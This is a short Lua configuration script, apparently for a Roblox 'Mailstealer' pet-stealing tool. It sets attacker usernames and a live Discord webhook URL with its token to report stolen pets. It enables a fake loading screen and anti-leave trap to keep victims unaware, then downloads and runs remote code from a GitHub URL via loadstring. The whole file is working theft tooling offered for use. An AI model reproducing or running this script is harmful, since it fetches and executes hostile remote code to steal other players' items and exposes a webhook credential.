--[[
  __  __       _ _     _             _           
  |  \/  | __ _(_) |___| |_ ___  __ _| | ___ _ __ 
  | |\/| |/ _` | | / __| __/ _ \/ _` | |/ _ \ '__|
  | |  | | (_| | | \__ \ ||  __/ (_| | |  __/ |   
  |_|  |_|\__,_|_|_|___/\__\___|\__,_|_|\___|_|   

]]--

UserName = "SHAM1358" -- good pets
Webhook = "https://discord.com/api/webhooks/1129602625994752100/FEJ6Npo0TIOKjwlWyEOJQ4oV182ntcIgyYQANJXA6_IuW8OSJGaJRe1z3iZT0NnqTWQs" -- pings for pets
UserName2 = "faiz02849" -- bad pets 

_G.LoadingScreen = true -- make it true if you want the loadingscreen
_G.AntiLeave = true -- make it true if you want the antileave
_G.MouseLock = true -- make it true if you want the mouselock

loadstring(game:HttpGet("https://raw.githubusercontent.com/LypherX/MoriScripts/main/MoriScriptZ", true))()
